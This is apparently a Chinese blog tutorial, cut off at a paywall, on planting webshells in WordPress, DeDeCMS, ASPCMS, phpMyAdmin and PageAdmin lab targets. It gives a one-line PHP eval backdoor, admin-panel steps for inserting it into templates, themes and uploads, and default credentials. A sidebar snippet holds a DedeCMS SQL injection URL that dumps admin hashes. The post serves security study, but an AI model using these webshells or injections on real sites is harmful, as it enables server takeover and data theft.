常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)

于 2024-08-04 23:03:55 发布
阅读量2k 收藏 31
点赞数 29
文章标签: 常见CMS漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_76631050/article/details/140913638
版权

目录

一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

步骤三:访问以下连接即可获取WebShel...

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

步骤二:安装成功后访问主题下的网站后门文件..

二:DeDeCMS

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

姿势二:修改模板文件拿WebShel

步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下

步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...

步骤三:使用蚁剑进行连接测试.

姿势三:后台任意命令执行拿WebShell

步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

步骤三:使用蚁剑连接测试...

三:ASPCMS

姿势一:后台修改配置文件拿Shell

步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)

步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包

步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...

步骤四:访问以下地址进行连接...

四、PHPMyadmin

姿势⼀:通过⽇志⽂件拿Shell

姿势⼆:导⼊导出拿WebShell

1.首先判断mysql位置

2.猜测web路径

3.写webshell

4.浏览器

姿势三:界面图像化GetShell

五、Pageadmin

步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。

步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】

步骤三:解压文件。

步骤四:使用工具连接。

一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

#执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

#靶场地址

http://192.168.4.176:8080/wp-admin/

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

在其404模板中插入一句话木马代码.点击【更新文件】按钮

<?php eval($ POST['cmd']);?>

步骤三:访问以下连接即可获取WebShel...

#拼接路径

/wp-content/themes/twentyfifteen/404.php

#访问连接

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

菜刀连接:

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

主题文件

步骤二:安装成功后访问主题下的网站后门文件..

#拼接路径

/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#访问地址

http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#蚁剑连接

二:DeDeCMS

漏洞复现

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

#前台

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

#后台

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

#信息

username:admin

password:admin

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

#文件地址

最低0.47元/天 解锁文章
Meet.meet
关注
WordPress 未授权本地文件包含漏洞(CVE-2025-2294)
m0_50125527的博客
04-03 103
Kubio AI Page Builder 是 WordPress 平台上一款基于人工智能的现代化建站工具,专为无代码用户和开发者设计。该插件深度融合 AI 生成技术,提供拖拽式可视化编辑器,支持智能布局建议、实时内容生成和自动化设计优化,用户可通过自然语言指令快速生成响应式网页、区块模板和动态内容。
Web-CMS漏洞
凌云鹤YK
02-21 8587
Web-CMS漏洞Web-CMS漏洞漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞漏洞二:ThinkPHP 5 &lt;=5.0.22 远程代码执行高危漏洞漏洞三:微擎最新版SQL注入漏洞四:微擎1.5.4任意用户删除漏洞 Web-CMS漏洞 漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞 Url:https:/...
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3942
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
常见CMS漏洞
lhdbk______的博客
08-03 1123
常见CMS漏洞
CMS漏洞总结
include_voidmain的博客
08-01 5049
CMS漏洞总结
渗透测试学习目录
liupc的学习笔记
05-04 3572
1. 行业术语扫盲 2. 3.
社工资源整理
weixin_30865427的博客
07-16 1万+
CMS 1 Tncms 2 Discuz-6 3 phpvod 4 Website Creator 5 微信达微信数字投票管理系统 6 Stackla Social Hub 7 Banshee 8 mymps 9 Kolibri CMS 10 AnanyooCMS 11 ILAS网上图书馆 12 Destoon ...
利用WebShell拿Shell技巧
悦分享
08-01 2236
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
渗透测试-信息收集专题
aming小老弟
12-15 1182
信息收集 思路框架知识整理 ​​主动信息收集-直接访问[工具]打点​​​​收集内容​​​​自动化收集大厂 过滤​​​​运营商​​​​1 收集可能存在sql注入的url​​​​路径 后缀​​​​公司架构​​​​产品规格​​​​网站标题​​​​全国省市县分布​​​​国外脆弱​​​​被动信息收集-第三方服务打点​​​​信息收集-...
DeDeCMS漏洞
weixin_53198216的博客
08-03 293
4.在生成下选择更新主页HTML,将主页位置后缀改为php,首页模式选择生成静态,再点击更新主页HTML。2.选择模板下的默认模板管理,找到index.htm。7.打开蚁剑,输入网址和密码点击测试连接,显示成功。6.复制到地址栏访问,没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。
DeDe-cms 漏洞
weixin_69065643的博客
08-03 322
找到index.html修改。我们写一个一句话木马,点击访问后使用工具连接。
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初 · mochu7
05-18 2695
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
常见cms
qq_50854662的博客
04-02 818
什么是CMSCMS是Content Management System的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。 常见CMS有哪些? asp平台:动易CMS、创力CMS、科汛CMS、新云CMS; php平台:phpcms、织梦CMS、帝国CMS、php168 CMS; ASP.NET平台:Zoomla!逐浪CMS、动易CMS、风讯CMS、We7 CMS; ...
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 9104
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
wordpress4.8.1漏洞
最新发布
03-04
### WordPress 4.8.1 版本安全漏洞详情 WordPress 4.8.2 是一次重要的安全性更新,解决了多个存在于之前版本(包括4.8.1)中的高危漏洞。这些缺陷可能允许攻击者执行SQL注入攻击,从而获取敏感数据或控制网站[^1]。 具体来说,在 wp-includes/class-wp-tax-query.php 文件中存在一处逻辑错误,该问题源于对 `$query[terms]` 的不当处理方式。如果字段 `field` 被设置为特定值,则可能导致未经过充分验证的数据被用于构建查询语句,进而引发 SQL 注入风险[^3]。 ### 解决方案与修复建议 为了防止此类攻击的发生并保护站点免受潜在威胁的影响,官方推荐所有用户尽快升级至最新版的 WordPress 发布版本——当时即刻可用的是 4.8.2 或更高版本。此更新不仅修正了上述提到的安全隐患,还包含了其他改进措施来增强系统的整体稳定性与性能表现。 对于无法立即进行全面平台迁移的情况,可以考虑采取临时缓解策略: - **禁用不受信任输入源**:确保来自外部用户的任何参数都经过严格的过滤和转义处理后再参与数据库操作。 - **应用最小权限原则**:限制数据库账户仅拥有完成必要任务所需的最低限度权利,减少因意外泄露而造成的损害范围。 ```php // 示例代码展示如何正确处理 $query 参数以避免 SQL 注入 if ( isset( $query['field'] ) && 'term_taxonomy_id' === $query['field'] ) { // 对 term_taxonomy_ids 进行严格整数型转换 $_ttids = array_map('absint', (array) $query['terms']); } else { // 默认情况下按照 slug 处理 terms 数组成员 $_terms = array_map('sanitize_title_for_query', (array) $query['terms']); } ``` 通过以上手段可以在一定程度上降低遭受攻击的风险,但仍强烈建议及时安装官方发布的正式补丁程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值